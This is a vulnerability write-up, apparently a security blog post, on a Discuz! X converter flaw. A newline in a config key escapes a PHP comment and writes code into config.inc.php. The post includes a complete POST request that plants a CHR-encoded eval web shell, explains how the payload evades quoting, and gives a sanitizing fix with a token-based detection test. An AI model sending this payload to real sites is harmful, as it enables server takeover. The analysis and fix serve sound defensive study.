Contents
1. Vulnerability description
2. Vulnerability trigger conditions
3. Vulnerability impact range
4. Vulnerability code analysis
5. Defense methods
6. Attack and defense thinking
1. Vulnerability description
For PHP applications it is essential to keep the "data/code" boundary of user input correctly delimited. Attackers exploit a weak boundary by injecting a delimiter (whose exact form depends on the context) into the input data, so that the target system parses what follows as code and executes it: this is code injection.
The root cause of this vulnerability is that user input is written into a PHP comment, and a newline (the delimiter) inside that input ends the comment, turning the rest of the input into code that is executed.
Relevant Link:
http://p2j.cn/?p=357
http://loudong.360.cn/blog/view/id/15
http://www.2cto.com/Article/201402/278766.html
http://drops.wooyun.org/papers/929
2. Vulnerability Trigger Conditions
1. /convert/include/global.func.php does not effectively filter user input: characters other than digits, letters and underscores are allowed through.
2. /convert/data/config.inc.php is writable by the web server.
0x1: Manual exploitation
http://localhost/discuz/utility/convert/index.php
http://localhost/discuz/utility/convert/index.php?a=config&source=d7.2_x2.0
In the "start settings" step you can set the configuration properties; the POSTed data is written directly into config.inc.php.
0x2: POC for automated testing
POST /DZ2/convert/ HTTP/1.1
Host: 192.168.52.129
Proxy-Connection: keep-alive
Content-Length: 925
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Origin: null
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/29.0.1547.57 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8

a=config&source=d7.2_x2.0&submit=yes&newconfig%5Btarget%5D%5Bdbhost%5D=localhost&newconfig%5Baaa%0D%0A%0D%0Aeval%28CHR%28101%29.CHR%28118%29.CHR%2897%29.CHR%28108%29.CHR%2840%29.CHR%2834%29.CHR%2836%29.CHR%2895%29.CHR%2880%29.CHR%2879%29.CHR%2883%29.CHR%2884%29.CHR%2891%29.CHR%2899%29.CHR%2893%29.CHR%2859%29.CHR%2834%29.CHR%2841%29.CHR%2859%29%29%3B%2F%2F%5D=localhost&newconfig%5Bsource%5D%5Bdbuser%5D=root&newconfig%5Bsource%5D%5Bdbpw%5D=&newconfig%5Bsource%5D%5Bdbname%5D=discuz&newconfig%5Bsource%5D%5Btablepre%5D=cdb_&newconfig%5Bsource%5D%5Bdbcharset%5D=&newconfig%5Bsource%5D%5Bpconnect%5D=1&newconfig%5Btarget%5D%5Bdbhost%5D=localhost&newconfig%5Btarget%5D%5Bdbuser%5D=root&newconfig%5Btarget%5D%5Bdbpw%5D=&newconfig%5Btarget%5D%5Bdbname%5D=discuzx&newconfig%5Btarget%5D%5Btablepre%5D=pre_&newconfig%5Btarget%5D%5Bdbcharset%5D=&newconfig%5Btarget%5D%5Bpconnect%5D=1&submit=%B1%A3%B4%E6%B7%FE%CE%F1%C6%F7%C9%E8%D6%C3
Sending this request is enough to get a shell: the malicious code is written into /convert/data/config.inc.php. Two details of the payload follow from buildarray() (section 4). The key is passed through strtoupper() before it lands in the comment line, and it is later interpolated, unescaped, into the single-quoted $_config['...'] assignment, so a single quote in the key would turn the whole generated file into a parse error. Building the string with CHR() avoids quote characters and survives the case change, because PHP function names and eval are case-insensitive. Decoded, the injected call is eval('eval("$_POST[c];");'), a one-line web shell that runs whatever arrives in POST parameter c.
3. Vulnerability Impact Range
All Discuz! X versions (the vulnerable code is the bundled utility/convert upgrade tool).
4. Vulnerability Code Analysis
\discuz\utility\convert\index.php
\discuz\utility\convert\include\do_config.inc.php
\discuz\utility\convert\include\global.func.php
Follow getvars(), which leads to the buildarray() function shown below (it serializes the submitted $newconfig array into the PHP source of config.inc.php):
function buildarray($array, $level = 0, $pre = '$_config')
{
    static $ks;
    if($level == 0)
    {
        $ks = array();
        $return = '';
    }
    foreach ($array as $key => $val)
    {
        if($level == 0)
        {
            $newline = str_pad(' CONFIG '.strtoupper($key).' ', 50, '-', STR_PAD_BOTH);
            /*
            This is where the vulnerability is introduced.
            1. Discuz's intention is to use each key of the $config array as the "comment title" of its configuration section.
            2. The $newline written into the configuration file is derived from $key, and $key is attacker-controlled.
            3. No boundary handling is applied to the input, so an attacker can put a newline into the key, escape the comment, and turn the rest of the key into executable code.
               1) A line break ends a // comment.
               2) ?> also ends a // comment (and leaves PHP mode), so it works as a delimiter just as well.
            */
            $return .= "\r\n// $newline //\r\n";
        }
        $ks[$level] = $ks[$level - 1]."['$key']";
        if(is_array($val))
        {
            $ks[$level] = $ks[$level - 1]."['$key']";
            $return .= buildarray($val, $level + 1, $pre);
        }
        else
        {
            // Only $val is escaped (single-quoted, with ' and \ backslashed); $key is interpolated as-is
            $val = !is_array($val) && (!preg_match("/^\-?[1-9]\d*$/", $val) || strlen($val) > 12) ? '\''.addcslashes($val, '\'\\').'\'' : $val;
            $return .= $pre.$ks[$level - 1]."['$key']"." = $val;\r\n";
        }
    }
    return $return;
}
5. Defense Methods
function buildarray($array, $level = 0, $pre = '$_config')
{
    static $ks;
    if($level == 0)
    {
        $ks = array();
        $return = '';
    }
    foreach ($array as $key => $val)
    {
        // Strip everything except letters, digits and underscores from $key
        // before it reaches either the comment line or the $_config['...'] index
        $key = preg_replace("/[^\w]/", "", $key);
        if($level == 0)
        {
            $newline = str_pad(' CONFIG '.strtoupper($key).' ', 50, '-', STR_PAD_BOTH);
            $return .= "\r\n// $newline //\r\n";
        }
        $ks[$level] = $ks[$level - 1]."['$key']";
        if(is_array($val))
        {
            $ks[$level] = $ks[$level - 1]."['$key']";
            $return .= buildarray($val, $level + 1, $pre);
        }
        else
        {
            $val = !is_array($val) && (!preg_match("/^\-?[1-9]\d*$/", $val) || strlen($val) > 12) ? '\''.addcslashes($val, '\'\\').'\'' : $val;
            $return .= $pre.$ks[$level - 1]."['$key']"." = $val;\r\n";
        }
    }
    return $return;
}
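To see both the break-out and the fix on realistic input, the following is an added example written for this page, not Discuz code. It re-implements the config generator in a simplified but behaviourally equivalent form (the index path is passed down recursively instead of kept in the static $ks array), runs it with and without the section 5 filter against a constructed $newconfig that mirrors the POC request above, and then tokenizes the generated file with PHP's own token_get_all() to detect any code that escaped the comment. The function names buildconfig(), findCodeTokens() and sampleConfig(), the "<?php" header and the sample array are assumptions of this example.

```php
<?php
// Added example, not Discuz code. buildconfig() mirrors buildarray(): a
// "// ----- CONFIG KEY ----- //" comment above each top-level section and one
// "$_config['a']['b'] = value;" line per leaf. With $sanitize = true it applies
// the fix from section 5 (keep only [A-Za-z0-9_] in the key).
function buildconfig(array $array, bool $sanitize, string $path = '', int $level = 0): string
{
    $return = '';
    foreach ($array as $key => $val) {
        $key = (string)$key;
        if ($sanitize) {
            $key = preg_replace('/[^\w]/', '', $key);
        }
        if ($level == 0) {
            $newline = str_pad(' CONFIG ' . strtoupper($key) . ' ', 50, '-', STR_PAD_BOTH);
            $return .= "\r\n// $newline //\r\n";
        }
        $here = $path . "['$key']";          // the key is interpolated unescaped, as in Discuz
        if (is_array($val)) {
            $return .= buildconfig($val, $sanitize, $here, $level + 1);
        } else {
            $val = (string)$val;
            // Integers of at most 12 chars are emitted bare; everything else is
            // single-quoted with ' and \ backslashed. Only the value is escaped.
            $val = (!preg_match('/^\-?[1-9]\d*$/', $val) || strlen($val) > 12)
                ? "'" . addcslashes($val, "'\\") . "'"
                : $val;
            $return .= '$_config' . $here . " = $val;\r\n";
        }
    }
    return $return;
}

// Tokenize a generated config file and return every token that a file made only
// of comments and "$_config[...] = literal;" statements should never contain.
// A non-empty result means user data was emitted as code.
function findCodeTokens(string $php): array
{
    $allowedIds   = [T_OPEN_TAG, T_WHITESPACE, T_COMMENT, T_VARIABLE,
                     T_CONSTANT_ENCAPSED_STRING, T_LNUMBER];
    $allowedChars = ['[', ']', '=', ';', '-'];   // '-' for bare negative integers
    $bad = [];
    foreach (token_get_all($php) as $tok) {
        if (is_array($tok)) {
            if (!in_array($tok[0], $allowedIds, true)) {
                $bad[] = token_name($tok[0]) . '(' . trim($tok[1]) . ')';
            }
        } elseif (!in_array($tok, $allowedChars, true)) {
            $bad[] = $tok;
        }
    }
    return $bad;
}

// Constructed input: the array the POC request on this page produces, including
// the key that carries "\r\n\r\n" followed by the CHR()-encoded eval() call.
function sampleConfig(): array
{
    $payload = "aaa\r\n\r\neval(CHR(101).CHR(118).CHR(97).CHR(108).CHR(40).CHR(34)"
             . ".CHR(36).CHR(95).CHR(80).CHR(79).CHR(83).CHR(84).CHR(91).CHR(99)"
             . ".CHR(93).CHR(59).CHR(34).CHR(41).CHR(59));//";
    return [
        'source' => ['dbhost' => 'localhost', 'dbuser' => 'root', 'dbpw' => '',
                     'dbname' => 'discuz', 'tablepre' => 'cdb_', 'pconnect' => '1'],
        $payload => 'localhost',
        'target' => ['dbhost' => 'localhost', 'dbuser' => 'root', 'dbpw' => '',
                     'dbname' => 'discuzx', 'tablepre' => 'pre_', 'pconnect' => '1'],
    ];
}

foreach ([false, true] as $sanitize) {
    // The "<?php" header is assumed; the real writer prepends its own.
    $file = "<?php\r\n" . buildconfig(sampleConfig(), $sanitize);
    $bad  = findCodeTokens($file);
    printf("sanitize=%s: %d unexpected token(s)%s\n",
        var_export($sanitize, true), count($bad),
        $bad ? ' e.g. ' . implode(' ', array_slice($bad, 0, 4)) : '');
}
```

Run it with php on the command line: the unsanitized pass reports T_EVAL(EVAL), T_STRING(CHR) and parentheses, i.e. the comment ended at the first \r\n and the rest of the key became statements, while the sanitized pass reports no unexpected tokens. Two caveats on the section 5 fix are worth keeping in mind. It silently rewrites the key instead of rejecting the request, so a hostile or mistyped key still produces a configuration section, just under an unexpected name; rejecting keys that do not match ^\w+$ is the stricter choice. It also relies on \w being ASCII-only, which holds for PCRE without the /u modifier but is something to re-check if the pattern is ever changed. The token check is the defence-in-depth counterpart for any code generator of this kind: a file that should contain only literals must never tokenize to T_EVAL, T_STRING or a parenthesis, and a single quote in an unescaped key (which this filter also removes) would otherwise surface as a parse error rather than a quiet success.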
6. Attack and Defense Thinking
Copyright (c) Littlehann All rights reserved
Discuz! X upgrade/converter Getshell vulnerability via /convert/include/global.func.php: inject special symbols into /convert/data/config.inc.php